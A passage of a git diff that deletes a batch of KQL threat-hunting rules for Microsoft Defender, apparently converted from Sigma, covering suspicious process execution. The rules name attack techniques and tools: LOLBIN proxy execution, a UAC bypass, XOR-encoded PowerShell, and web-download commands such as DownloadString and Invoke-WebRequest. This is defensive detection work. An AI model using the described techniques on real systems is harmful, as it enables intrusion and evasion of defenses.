netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql b/Execution/Suspicious_WindowsTerminal_Child_Processes.kql deleted file mode 100644 index 04afff03..00000000 --- a/Execution/Suspicious_WindowsTerminal_Child_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/25 -// Level: medium -// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) -// Tags: attack.execution, attack.persistence -DeviceProcessEvents -| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat")))) \ No newline at end of file diff --git a/Execution/Suspicious_WmiPrvSE_Child_Process.kql b/Execution/Suspicious_WmiPrvSE_Child_Process.kql deleted file mode 100644 index dbebbd92..00000000 --- a/Execution/Suspicious_WmiPrvSE_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects suspicious and uncommon child processes of WmiPrvSE -// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql deleted file mode 100644 index f68123c0..00000000 --- a/Execution/Suspicious_XOR_Encoded_PowerShell_Command.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali -// Date: 2018/09/05 -// Level: medium -// Description: Detects presence of a potentially xor encoded powershell command -// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/Execution/Suspicious_ZipExec_Execution.kql b/Execution/Suspicious_ZipExec_Execution.kql deleted file mode 100644 index 59378b3b..00000000 --- a/Execution/Suspicious_ZipExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/07 -// Level: medium -// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip") \ No newline at end of file diff --git a/Execution/Sysprep_on_AppData_Folder.kql b/Execution/Sysprep_on_AppData_Folder.kql deleted file mode 100644 index 285f542e..00000000 --- a/Execution/Sysprep_on_AppData_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/06/22 -// Level: medium -// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe" \ No newline at end of file diff --git a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index e0972b4b..00000000 --- a/Execution/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ) -// Date: 2024/02/02 -// Level: medium -// Description: An adversary might use WMI to discover information about the system, such as the volume name, size, -free space, and other disk information. This can be done using the `wmic` command-line utility and has been -observed being used by threat actors such as Volt Typhoon. - -// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 -DeviceProcessEvents -| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Tasks_Folder_Evasion.kql b/Execution/Tasks_Folder_Evasion.kql deleted file mode 100644 index 057c6541..00000000 --- a/Execution/Tasks_Folder_Evasion.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Sreeman -// Date: 2020/01/13 -// Level: high -// Description: The Tasks folder in system32 and syswow64 are globally writable paths. -Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr - -// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\") \ No newline at end of file diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql deleted file mode 100644 index 26df3a86..00000000 --- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql deleted file mode 100644 index 25b12cc5..00000000 --- a/Execution/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql deleted file mode 100644 index b28bbd12..00000000 --- a/Execution/Uncommon_Child_Process_Of_Appvlp.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Sreeman -// Date: 2020/03/13 -// Level: medium -// Description: Detects uncommon child processes of Appvlp.EXE -Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. -Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder -or to mark a file as a system file. - -// Tags: attack.t1218, attack.defense_evasion, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE")))) \ No newline at end of file diff --git a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql deleted file mode 100644 index 77dfd04d..00000000 --- a/Execution/Uncommon_Child_Process_Of_BgInfo.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2019/10/26 -// Level: medium -// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe" \ No newline at end of file diff --git a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql deleted file mode 100644 index 43fcebb7..00000000 --- a/Execution/Uncommon_Child_Process_Of_Defaultpack.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/31 -// Level: medium -// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs -// Tags: attack.t1218, attack.defense_evasion, attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe" \ No newline at end of file diff --git a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql b/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql deleted file mode 100644 index f63cafcb..00000000 --- a/Execution/Uncommon_Child_Processes_Of_SndVol.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/09 -// Level: medium -// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) -// Tags: attack.execution -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql deleted file mode 100644 index 63e818d3..00000000 --- a/Execution/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/07/15 -// Level: high -// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql b/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql deleted file mode 100644 index baf4a934..00000000 --- a/Execution/Unusual_Parent_Process_For_Cmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/21 -// Level: medium -// Description: Detects suspicious parent process for cmd.exe -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe") \ No newline at end of file diff --git a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql b/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql deleted file mode 100644 index f826a6aa..00000000 --- a/Execution/Usage_Of_Web_Request_Commands_And_Cmdlets.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger -// Date: 2019/10/24 -// Level: medium -// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Net.WebClient" or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest" \ No newline at end of file diff --git a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql b/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql deleted file mode 100644 index 827d695b..00000000 --- a/Execution/Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/10 -// Level: medium -// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe" \ No newline at end of file diff --git a/Execution/Use_of_FSharp_Interpreters.kql b/Execution/Use_of_FSharp_Interpreters.kql deleted file mode 100644 index ca9448e4..00000000 --- a/Execution/Use_of_FSharp_Interpreters.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022/06/02 -// Level: medium -// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" -Both can be used for AWL bypass and to execute F# code via scripts or inline. - -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or (ProcessVersionInfoOriginalFileName in~ ("fsi.exe", "fsianycpu.exe")) \ No newline at end of file diff --git a/Execution/Use_of_OpenConsole.kql b/Execution/Use_of_OpenConsole.kql deleted file mode 100644 index 319b54f3..00000000 --- a/Execution/Use_of_OpenConsole.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/16 -// Level: medium -// Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "OpenConsole.exe" or FolderPath endswith "\\OpenConsole.exe") and (not(FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal")) \ No newline at end of file diff --git a/Execution/Use_of_Pcalua_For_Execution.kql b/Execution/Use_of_Pcalua_For_Execution.kql deleted file mode 100644 index 0f9642fe..00000000 --- a/Execution/Use_of_Pcalua_For_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2022/06/14 -// Level: medium -// Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ProcessCommandLine contains " -a" and FolderPath endswith "\\pcalua.exe" \ No newline at end of file diff --git a/Execution/Use_of_Scriptrunner.exe.kql b/Execution/Use_of_Scriptrunner.exe.kql deleted file mode 100644 index 0c832c20..00000000 --- a/Execution/Use_of_Scriptrunner.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/01 -// Level: medium -// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe") \ No newline at end of file diff --git a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql b/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql deleted file mode 100644 index a0582a37..00000000 --- a/Execution/Using_SettingSyncHost.exe_as_LOLBin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Anton Kutepov, oscd.community -// Date: 2020/02/05 -// Level: high -// Description: Detects using SettingSyncHost.exe to run hijacked binary -// Tags: attack.execution, attack.defense_evasion, attack.t1574.008 -DeviceProcessEvents -| where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath") \ No newline at end of file diff --git a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql b/Execution/VBA_DLL_Loaded_Via_Office_Application.kql deleted file mode 100644 index 44e3afbd..00000000 --- a/Execution/VBA_DLL_Loaded_Via_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonlovesdnb -// Date: 2020/02/19 -// Level: high -// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\VBE7.DLL" or FolderPath endswith "\\VBEUI.DLL" or FolderPath endswith "\\VBE7INTL.DLL") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/Execution/VMToolsd_Suspicious_Child_Process.kql b/Execution/VMToolsd_Suspicious_Child_Process.kql deleted file mode 100644 index fcf64329..00000000 --- a/Execution/VMToolsd_Suspicious_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: bohops, Bhabesh Raj -// Date: 2021/10/08 -// Level: high -// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe")))) \ No newline at end of file diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql deleted file mode 100644 index 76373e3d..00000000 --- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/11 -// Level: medium -// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe" \ No newline at end of file diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql deleted file mode 100644 index 275a6408..00000000 --- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023/04/11 -// Level: medium -// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe")) \ No newline at end of file diff --git a/Execution/WMIC_Remote_Command_Execution.kql b/Execution/WMIC_Remote_Command_Execution.kql deleted file mode 100644 index 11a8cfda..00000000 --- a/Execution/WMIC_Remote_Command_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/14 -// Level: medium -// Description: Detects the execution of WMIC to query information on a remote system -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "/node:" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "/node:127.0.0.1 " or ProcessCommandLine contains "/node:localhost "))) \ No newline at end of file diff --git a/Execution/WSL_Child_Process_Anomaly.kql b/Execution/WSL_Child_Process_Anomaly.kql deleted file mode 100644 index 83b49b76..00000000 --- a/Execution/WSL_Child_Process_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/23 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\")) \ No newline at end of file diff --git a/Execution/WScript_or_CScript_Dropper_-_File.kql b/Execution/WScript_or_CScript_Dropper_-_File.kql deleted file mode 100644 index 4bd91b3d..00000000 --- a/Execution/WScript_or_CScript_Dropper_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton -// Date: 2022/01/10 -// Level: high -// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe -// Tags: attack.execution, attack.t1059.005, attack.t1059.007 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData") \ No newline at end of file diff --git a/Execution/Wab_Execution_From_Non_Default_Location.kql b/Execution/Wab_Execution_From_Non_Default_Location.kql deleted file mode 100644 index 0ce9c87e..00000000 --- a/Execution/Wab_Execution_From_Non_Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/12 -// Level: high -// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\"))) \ No newline at end of file diff --git a/Execution/Weak_or_Abused_Passwords_In_CLI.kql b/Execution/Weak_or_Abused_Passwords_In_CLI.kql deleted file mode 100644 index 